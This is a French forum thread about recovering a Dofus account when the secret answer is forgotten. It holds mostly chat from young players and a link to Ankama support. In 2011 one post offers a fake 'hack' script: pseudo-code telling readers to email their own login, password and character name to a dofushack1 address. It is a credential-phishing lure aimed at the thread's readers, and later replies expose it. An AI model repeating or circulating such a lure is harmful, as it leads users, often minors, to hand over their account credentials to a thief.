Dofus réponse secrète

Résolu/Fermé
kex94 Messages postés 144 Date d'inscription dimanche 4 janvier 2009 Statut Membre Dernière intervention 29 décembre 2014 - 7 juil. 2009 à 20:00
 btx - 20 mars 2014 à 22:28
Bonjour, j'ai un ami qui veut changer son mot de passe de Dofus mais on lui demande sa réponse secrète et le problème sait que mon ami ne sait jamais créer de réponse secrète et aussi il a jamais été abonné
A voir également:

6 réponses

tiltGTA Messages postés 175 Date d'inscription lundi 12 janvier 2009 Statut Membre Dernière intervention 26 septembre 2009 28
7 juil. 2009 à 20:06
Donc t'espere qu'on te dise comment entrer dans un compte pour le hacker?!
Tu sais le Hack c'est pas bien!
je suppose que ton "pote" est un pauvre gars qui c'est fait chopé son mot de passe!
10
nn ses moi qui me suis fait hak
0
moi jai pomé ma réponse snif
0
comment cree une question secrete ?
0
pff moi aussi j'ai zaapé ma réponsse secréte ces quoiu le numérot de tel ?
0
slt b son comtp et foutu et c pourri dofus
3
euh oui son compte est foutu ... parcontre Dofus si ont sais jouer et pas ce faire chourer son compte c'est bien ^^'
0
pas
0
kex94 Messages postés 144 Date d'inscription dimanche 4 janvier 2009 Statut Membre Dernière intervention 29 décembre 2014 22
7 juil. 2009 à 20:26
C'est régler, je lui est passé ce site http://support.ankama.com/fr/envoyer-un-ticket/c4 et il l'a retrouver sa reponse secrete
2
samir
1

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
c normal pour posseder une reponse secrete il avoir etait mini abo une fois ...
mais moi aussi g un petit probleme je sui cra terre lvl 45 mais on ma aker .
allors je fais changer mdp et tou pui ca me met votre reponse screte et invalide alors kel na jamis ete changé svp aidez moi (je ne pe pas contacter le support car il est a mon nom mais je n'ai pas 15 ans .... ) merci
0
Salut ;) voila ce que j'ai trouvé sur le support : Vous munir d'une copie de votre pièce d'identité (carte d'identité, passeport, permis de conduire, livret de famille uniquement pour les mineurs de moins de 15 ans)
0
moi jai pas les carte et je pe pas car jai pas dimprimente
0
lol tu peut changer la rep secrete facilement
0
glara Messages postés 4 Date d'inscription vendredi 17 juin 2011 Statut Membre Dernière intervention 17 juin 2011
17 juin 2011 à 19:17
j'ai trouver la solution pour reprendre son compte hacker ou pour hacker un compte c'est très simple alors voila :

il faut envoyer a cette adresse : dofushack1@mail.com en mettant les informations suivantes :

{scrib}
if steam$=0 ;%ent="Le serveur"
packet id svs2.3
secure id v1.32
{!scrib}
id sender value="Le nom du personnage à hacker"
granted.%
auto.R=0
check pw="votre login"
secure2=$pw & "votre mot de passe"
postto=rpw
reply packet id svs2.3
secure idr v1.32
secure3="Nom de votre personnage"
reply=ad$pw
id$.send

Il faut remplacer les guillemets par les informations et biensur enlever les guillements !

metter comme titre FW:Add01=fcba$ mailsubject=item_reply&import

voilà pour moi ç a marché donc pour vous il n'y a pas de raison pour que ça échoue
0
Le faite pas ! Le mec et un petit hackeur de merde --' : check pw="votre login"
secure2=$pw & "votre mot de passe" . Trop pas griller --' ! Gros k-sos de boloss
0
Mdr y'en a il pense vraiment que l'on va donner notre compte,notre mot de passe xD
Et je suis sur qu'il y a des pommés de la vie qui vont lui envoyer ptdr
0